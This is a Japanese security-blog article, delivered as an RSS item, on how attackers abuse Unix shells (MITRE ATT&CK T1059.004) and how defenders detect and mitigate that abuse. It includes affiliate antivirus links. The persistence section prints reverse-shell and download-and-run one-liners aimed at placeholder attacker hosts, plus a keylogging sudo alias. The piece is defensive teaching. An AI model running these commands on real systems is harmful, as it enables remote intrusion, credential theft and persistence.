<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>T1059.004 Archives - AI Security Review</title>
	<atom:link href="https://ai-sec-review.com/tag/t1059-004/feed/" rel="self" type="application/rss+xml" />
	<link>https://ai-sec-review.com/tag/t1059-004/</link>
	<description>AI執筆×セキュリティ実務者監修のツールレビューサイト</description>
	<lastBuildDate>Thu, 26 Mar 2026 14:38:28 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://ai-sec-review.com/wp-content/uploads/2026/03/favicon_512-100x100.png</url>
	<title>T1059.004 Archives - AI Security Review</title>
	<link>https://ai-sec-review.com/tag/t1059-004/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:07:35 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[T1059.004]]></category>
		<category><![CDATA[Unix Shell]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell-2/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 MITRE ATT&#38;CK T1059.004「Unix Shell」は、攻撃者がLinuxやmacOS [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/">T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>MITRE ATT&amp;CK T1059.004「Unix Shell」は、攻撃者がLinuxやmacOS環境で標準搭載されているbash・sh・zshなどのUnixシェルを悪用して不正なコマンドを実行する攻撃手法です。Unixシェルはほぼすべてのサーバーやワークステーションにプリインストールされており、管理者が日常的に使うツールであるため、攻撃の痕跡が正規の操作に紛れやすいという特徴があります。本記事では、T1059.004の定義から具体的な攻撃手法、実際のAPTグループによる悪用事例、そして検知・防御方法まで包括的に解説します。</p>




  <div id="toc" class="toc tnt-number toc-center tnt-number border-element"><input type="checkbox" class="toc-checkbox" id="toc-checkbox-2" checked><label class="toc-title" for="toc-checkbox-2">目次</label>
    <div class="toc-content">
    <ol class="toc-list open"><li><a href="#toc1" tabindex="0">T1059.004 Unix Shellとは？（MITRE ATT&amp;CK定義）</a></li><li><a href="#toc2" tabindex="0">攻撃者がUnix Shellを悪用する理由</a><ol><li><a href="#toc3" tabindex="0">あらゆるシステムに標準搭載されている</a></li><li><a href="#toc4" tabindex="0">強力なスクリプティング機能</a></li><li><a href="#toc5" tabindex="0">正規の管理操作との区別が困難</a></li><li><a href="#toc6" tabindex="0">バックドアと永続化が容易</a></li></ol></li><li><a href="#toc7" tabindex="0">シェルスクリプトによるバックドア・永続化の手法</a><ol><li><a href="#toc8" tabindex="0">crontabを利用した永続化</a></li><li><a href="#toc9" tabindex="0">.bashrc / .profileを利用した永続化</a></li><li><a href="#toc10" tabindex="0">リバースシェルの手法</a></li></ol></li><li><a href="#toc11" tabindex="0">実際の攻撃グループによるUnix Shell悪用事例</a><ol><li><a href="#toc12" tabindex="0">APT32（OceanLotus）</a></li><li><a href="#toc13" tabindex="0">TeamTNT</a></li><li><a href="#toc14" tabindex="0">Rocke Group</a></li><li><a href="#toc15" tabindex="0">Lazarus Group</a></li></ol></li><li><a href="#toc16" tabindex="0">Unix Shell攻撃の検知方法</a><ol><li><a href="#toc17" tabindex="0">auditdによるコマンド実行監視</a></li><li><a href="#toc18" tabindex="0">Syslog・bash履歴の監視</a></li><li><a href="#toc19" tabindex="0">EDR（Endpoint Detection and Response）の活用</a></li></ol></li><li><a href="#toc20" tabindex="0">Unix Shell攻撃への緩和策</a><ol><li><a href="#toc21" tabindex="0">制限付きシェル（Restricted Shell）の導入</a></li><li><a href="#toc22" tabindex="0">AppArmor / SELinuxによるアクセス制御</a></li><li><a href="#toc23" tabindex="0">スクリプトのホワイトリスト化</a></li><li><a href="#toc24" tabindex="0">ネットワークレベルの対策</a></li></ol></li><li><a href="#toc25" tabindex="0">関連するATT&amp;CKテクニック</a></li><li><a href="#toc26" tabindex="0">おすすめセキュリティ対策ツール</a></li><li><a href="#toc27" tabindex="0">まとめ</a></li><li><a href="#toc28" tabindex="0">参考リンク</a></li></ol>
    </div>
  </div>

<h2 class="wp-block-heading"><span id="toc1">T1059.004 Unix Shellとは？（MITRE ATT&amp;CK定義）</span></h2>



<p>MITRE ATT&amp;CKフレームワークにおけるT1059.004は、<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a>のサブテクニックの一つです。攻撃者がUnixシェル（bash、sh、zsh、csh、tcshなど）を利用して、ターゲットシステム上でコマンドやスクリプトを実行する手法を指します。</p>



<p>Unixシェルは、Linux・macOS・BSD系OSに標準搭載されるコマンドラインインタプリタであり、ファイル操作、プロセス管理、ネットワーク通信など、OSのほぼすべての機能にアクセスできます。攻撃者はこの強力な機能を悪用し、初期侵入後のペイロード実行から永続化、データ窃取まで多様な目的に利用します。</p>



<p>MITRE ATT&amp;CKの公式定義は、<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/004/" target="_blank">MITRE ATT&amp;CK T1059.004 Unix Shell</a>をご参照ください。</p>



<h2 class="wp-block-heading"><span id="toc2">攻撃者がUnix Shellを悪用する理由</span></h2>



<h3 class="wp-block-heading"><span id="toc3">あらゆるシステムに標準搭載されている</span></h3>



<p>bashやshは、Linuxディストリビューション・macOS・コンテナイメージなどほぼすべてのUnix系環境に標準でインストールされています。攻撃者は追加のツールをダウンロードすることなく、侵入直後からシェルを利用して偵察やラテラルムーブメントを実行できます。</p>



<h3 class="wp-block-heading"><span id="toc4">強力なスクリプティング機能</span></h3>



<p>シェルスクリプトは、変数・条件分岐・ループ・関数・パイプラインなど高度なプログラミング機能を備えています。攻撃者はこれらを組み合わせて、システム偵察スクリプト、データ収集ツール、自動化されたエクスプロイトチェーンを容易に構築できます。</p>



<h3 class="wp-block-heading"><span id="toc5">正規の管理操作との区別が困難</span></h3>



<p>システム管理者が日常的にシェルを使用するため、攻撃者のシェル操作が正規の管理操作に紛れやすくなります。単純なログ監視だけでは、悪意のあるコマンド実行と正常な管理操作を区別することが難しいのが現状です。</p>



<h3 class="wp-block-heading"><span id="toc6">バックドアと永続化が容易</span></h3>



<p>シェルスクリプトをcrontabや.bashrc、systemdサービスに仕込むことで、攻撃者はシステム再起動後も持続するバックドアを簡単に設置できます。これらの設定ファイルは管理者が頻繁に確認するものではないため、長期間検知されないリスクがあります。</p>




<h2 class="wp-block-heading"><span id="toc7">シェルスクリプトによるバックドア・永続化の手法</span></h2>



<h3 class="wp-block-heading"><span id="toc8">crontabを利用した永続化</span></h3>



<p>攻撃者はcrontabにリバースシェルを登録し、定期的にC2サーバーへの接続を試みます。以下は典型的な手法です：</p>



<pre class="wp-block-code"><code># 攻撃者がcrontabに仕込むリバースシェルの例
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

# 別の手法：wgetでスクリプトをダウンロードして実行
*/10 * * * * wget -q -O- http://ATTACKER_DOMAIN/payload.sh | bash</code></pre>



<p>このようなcrontabエントリは、<code>crontab -l</code>で確認できますが、各ユーザーのcrontabを定期的に監査していなければ見逃される可能性があります。</p>



<h3 class="wp-block-heading"><span id="toc9">.bashrc / .profileを利用した永続化</span></h3>



<p>攻撃者はユーザーのシェル初期化ファイル（.bashrc、.bash_profile、.profile、.zshrc）に悪意のあるコードを追記します。ユーザーがログインするたびにバックドアコードが自動実行されます。</p>



<pre class="wp-block-code"><code># .bashrcに追記されるバックドアの例
export PATH="/tmp/.hidden_bin:$PATH"
# 一見無害なエイリアスに偽装
alias sudo='function _sudo(){ /tmp/.keylogger "$@"; command sudo "$@"; };_sudo'</code></pre>



<h3 class="wp-block-heading"><span id="toc10">リバースシェルの手法</span></h3>



<p>Unixシェルを利用した代表的なリバースシェル手法は多数存在します：</p>



<pre class="wp-block-code"><code># bashによるリバースシェル
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# パイプを使ったリバースシェル
mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f

# Pythonを経由したシェル起動（T1059.006との組み合わせ）
python3 -c 'import os; os.system("/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\"")'</code></pre>



<p>Python経由のシェル起動については、<a href="https://ai-sec-review.com/t1059-006-python%e3%82%92%e6%82%aa%e7%94%a8%e3%81%97%e3%81%9f%e6%94%bb%e6%92%83%e6%89%8b%e6%b3%95%e3%81%a8%e6%a4%9c%e7%9f%a5%e6%96%b9%e6%b3%95%e3%80%90mitre-attck%e3%80%91/">T1059.006 Pythonを悪用した攻撃手法と検知方法</a>もあわせてご覧ください。</p>



<h2 class="wp-block-heading"><span id="toc11">実際の攻撃グループによるUnix Shell悪用事例</span></h2>



<p>複数のAPTグループがUnixシェルを攻撃ツールチェーンの中核として利用しています。</p>



<h3 class="wp-block-heading"><span id="toc12">APT32（OceanLotus）</span></h3>



<p>ベトナムに関連するとされるAPT32は、Linuxサーバーへの侵入後にbashスクリプトを利用してバックドアの設置やデータ収集を実行することが確認されています。シェルスクリプトでシステム情報を収集し、C2サーバーへ送信する手法が報告されています。</p>



<h3 class="wp-block-heading"><span id="toc13">TeamTNT</span></h3>



<p>クラウド環境を標的とするTeamTNTは、bashスクリプトを多用してDockerコンテナやKubernetes環境に侵入します。クリプトマイナーの設置、SSHキーの窃取、ラテラルムーブメントのすべてをシェルスクリプトで自動化していることが特徴です。</p>



<h3 class="wp-block-heading"><span id="toc14">Rocke Group</span></h3>



<p>クリプトジャッキングで知られるRocke Groupは、bashスクリプトを使用してセキュリティソフトの無効化、競合するマイナーの停止、自身のマイナーのインストールを一連のスクリプトで実行します。crontabを利用した永続化も確認されています。</p>



<h3 class="wp-block-heading"><span id="toc15">Lazarus Group</span></h3>



<p>北朝鮮に関連するLazarus Groupは、LinuxおよびmacOS環境でシェルスクリプトを使用した攻撃を展開しています。初期侵入後のペイロードダウンロードやシステム偵察にbashコマンドを使用する事例が複数報告されています。</p>



<h2 class="wp-block-heading"><span id="toc16">Unix Shell攻撃の検知方法</span></h2>



<h3 class="wp-block-heading"><span id="toc17">auditdによるコマンド実行監視</span></h3>



<p>Linuxのauditdフレームワークは、execveシステムコールを監視することで、すべてのコマンド実行を記録できます。</p>



<pre class="wp-block-code"><code># /etc/audit/audit.rules に追加
-a always,exit -F arch=b64 -S execve -k shell_exec
-a always,exit -F arch=b32 -S execve -k shell_exec

# bash実行の監視
-w /bin/bash -p x -k bash_execution
-w /bin/sh -p x -k sh_execution
-w /bin/zsh -p x -k zsh_execution</code></pre>



<p>auditdのログは<code>/var/log/audit/audit.log</code>に出力され、<code>ausearch</code>コマンドで検索可能です。SIEM（Security Information and Event Management）と連携することで、異常なシェル実行パターンをリアルタイムに検知できます。</p>



<h3 class="wp-block-heading"><span id="toc18">Syslog・bash履歴の監視</span></h3>



<p>bashの履歴機能を強化することで、攻撃者のコマンド操作を記録・追跡できます。</p>



<pre class="wp-block-code"><code># /etc/profile.d/bash_audit.sh に設定
export HISTTIMEFORMAT="%F %T "
export HISTSIZE=100000
export HISTFILESIZE=100000
shopt -s histappend
export PROMPT_COMMAND='history -a; logger -t bash -p auth.info "user=$(whoami) cmd=$(history 1)"'</code></pre>



<p>上記の設定により、すべてのbashコマンドがsyslogに転送され、集中ログ管理サーバーで監視できるようになります。ただし、攻撃者が<code>unset HISTFILE</code>や<code>HISTSIZE=0</code>を実行して履歴を無効化する可能性があるため、auditdとの併用が推奨されます。</p>



<h3 class="wp-block-heading"><span id="toc19">EDR（Endpoint Detection and Response）の活用</span></h3>



<p>Linux対応のEDR製品は、プロセスの親子関係やコマンドライン引数を分析し、不審なシェル実行を検知します。特に以下のパターンは高い確度で攻撃を示唆します：</p>



<ul class="wp-block-list">
<li>Webサーバープロセス（apache、nginx）からのシェル起動</li>
<li><code>/dev/tcp/</code>を含むbashコマンドの実行</li>
<li>base64デコード後のシェル実行（<code>echo ... | base64 -d | bash</code>）</li>
<li>一時ディレクトリ（/tmp、/dev/shm）からのスクリプト実行</li>
<li>通常と異なるユーザーアカウントからのシェル起動</li>
</ul>



<h2 class="wp-block-heading"><span id="toc20">Unix Shell攻撃への緩和策</span></h2>



<h3 class="wp-block-heading"><span id="toc21">制限付きシェル（Restricted Shell）の導入</span></h3>



<p>rbash（restricted bash）を利用することで、ユーザーが実行できるコマンドやアクセスできるディレクトリを制限できます。サービスアカウントには必要最小限の権限のシェルを割り当てることが重要です。シェルが不要なアカウントには<code>/sbin/nologin</code>や<code>/bin/false</code>を設定しましょう。</p>



<h3 class="wp-block-heading"><span id="toc22">AppArmor / SELinuxによるアクセス制御</span></h3>



<p>MAC（Mandatory Access Control）フレームワークを活用することで、プロセスがアクセスできるファイルやネットワーク接続を厳密に制御できます。Webサーバーやアプリケーションサーバーのプロファイルを適切に設定し、不要なシェル起動を防止することが効果的です。</p>



<pre class="wp-block-code"><code># AppArmorプロファイルの例（Webサーバーからのシェル実行を禁止）
/usr/sbin/nginx {
  # シェルの実行を拒否
  deny /bin/bash rx,
  deny /bin/sh rx,
  deny /bin/dash rx,
  deny /bin/zsh rx,
}</code></pre>



<h3 class="wp-block-heading"><span id="toc23">スクリプトのホワイトリスト化</span></h3>



<p>fapolicyd（File Access Policy Daemon）やIMA（Integrity Measurement Architecture）を利用して、承認済みのスクリプトのみ実行を許可する仕組みを構築できます。信頼されたスクリプトにのみ実行権限を付与し、未知のスクリプトの実行を検知・ブロックすることで、攻撃者が持ち込んだスクリプトの実行を防止します。</p>



<h3 class="wp-block-heading"><span id="toc24">ネットワークレベルの対策</span></h3>



<p>リバースシェルの多くはアウトバウンド接続を利用するため、egress（出口）フィルタリングが有効です。サーバーからのアウトバウンド接続を必要最小限のIPアドレス・ポートに制限することで、リバースシェルの確立を防止できます。</p>



<h2 class="wp-block-heading"><span id="toc25">関連するATT&amp;CKテクニック</span></h2>



<p>Unix Shell攻撃は、他のATT&amp;CKテクニックと組み合わせて使用されることが多いです。関連テクニックも理解しておきましょう。</p>



<ul class="wp-block-list">
<li><a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a>（親テクニック）</li>
<li><a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">T1059.001 PowerShell</a> — Windows環境での同等の攻撃手法</li>
<li><a href="https://ai-sec-review.com/t1059-006-python%e3%82%92%e6%82%aa%e7%94%a8%e3%81%97%e3%81%9f%e6%94%bb%e6%92%83%e6%89%8b%e6%b3%95%e3%81%a8%e6%a4%9c%e7%9f%a5%e6%96%b9%e6%b3%95%e3%80%90mitre-attck%e3%80%91/">T1059.006 Python</a> — Python経由でシェルを起動する手法との連携</li>
</ul>



<h2 class="wp-block-heading"><span id="toc26">おすすめセキュリティ対策ツール</span></h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
Unix Shellを悪用したLinux/macOS攻撃を検知するために、信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading"><span id="toc27">まとめ</span></h2>



<p>T1059.004 Unix Shellは、Linux/macOS環境における最も基本的かつ広く悪用される攻撃手法の一つです。以下のポイントを押さえて対策を進めましょう。</p>



<ul class="wp-block-list">
<li><strong>bashやshはほぼすべてのUnix系OSに搭載</strong>されており、攻撃者は追加ツールなしでコマンド実行が可能</li>
<li><strong>crontab・.bashrc・systemdを利用した永続化</strong>が容易であり、定期的な監査が不可欠</li>
<li><strong>auditdによるexecve監視</strong>とbash履歴のsyslog転送を組み合わせた多層的な検知が有効</li>
<li><strong>AppArmor/SELinuxによるMAC</strong>でWebサーバー等からのシェル起動を制限し、攻撃面を縮小</li>
<li><strong>egress フィルタリング</strong>でリバースシェルの確立を防止し、侵害の拡大を阻止</li>
</ul>



<p>Based on MITRE ATT&amp;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.</p>



<p>※本サイトはMITRE非公式の解説サイトです</p>



<h2 class="wp-block-heading"><span id="toc28">参考リンク</span></h2>



<ul class="wp-block-list">
<li><a rel="noopener" href="https://attack.mitre.org/techniques/T1059/004/" target="_blank">MITRE ATT&amp;CK T1059.004 Unix Shell</a></li>
<li><a rel="noopener" href="https://www.ipa.go.jp/security/" target="_blank">IPA 情報セキュリティ</a></li>
<li><a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a></li>
<li><a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">内閣サイバーセキュリティセンター（NISC）</a></li>
</ul>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p style="color:#64748b;font-size:0.85rem">Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報は<a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE公式サイト</a>をご参照ください。</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/">T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-004-unix-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
